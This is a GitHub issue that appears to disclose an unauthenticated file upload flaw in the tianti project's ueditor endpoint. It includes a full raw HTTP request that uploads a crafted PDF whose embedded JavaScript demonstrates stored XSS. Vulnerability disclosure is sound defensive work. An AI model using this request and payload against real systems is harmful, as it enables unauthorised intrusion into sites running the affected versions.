tianti icon indicating copy to clipboard operation
tianti copied to clipboard
verified publisher icon xujeff

Insecure File Upload Vulnerability (unauthenticated)

Open NinjaGPT opened this issue 5 months ago • 0 comments

Summary

The project's file upload functionality in versions <=2.3 uses a vulnerable ueditor that allows uploading arbitrary PDF files without any security processing, and this functionality can be accessed without any authentication requirements. This allows attackers to upload malicious PDFs containing XSS payloads without requiring any account, resulting in a stored XSS vulnerability.

POC

POST /tianti-module-admin/ueditor/controller.jsp?action=uploadfile&encode=utf-8 HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 1394
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysDUjcsAUzEcxvms3
sec-ch-ua-mobile: ?0
X_Requested_With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/tianti-module-admin/ueditor/dialogs/image/image.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Connection: close

------WebKitFormBoundarysDUjcsAUzEcxvms3
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundarysDUjcsAUzEcxvms3
Content-Disposition: form-data; name="name"

pocpdf.jpg
------WebKitFormBoundarysDUjcsAUzEcxvms3
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundarysDUjcsAUzEcxvms3
Content-Disposition: form-data; name="lastModifiedDate"

Tue Jun 24 2025 13:42:53 GMT+0800 (中国标准时间)
------WebKitFormBoundarysDUjcsAUzEcxvms3
Content-Disposition: form-data; name="size"

731
------WebKitFormBoundarysDUjcsAUzEcxvms3
Content-Disposition: form-data; name="upfile"; filename="pocpdf.pdf"
Content-Type: image/jpeg

%PDF-1.3
%    
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
  <</O
  <</JS
  (
try {
  app.alert\("XSS"\)
} catch (e) {
  app.alert('Error: ' + e.message);
}
  ) 
  /S /JavaScript>>>>
  /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
  /Resources
  <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
  /Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
 
BT
/F1 24 Tf
ET
    
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
------WebKitFormBoundarysDUjcsAUzEcxvms3--
Image Image

NinjaGPT avatar Aug 04 '25 02:08 NinjaGPT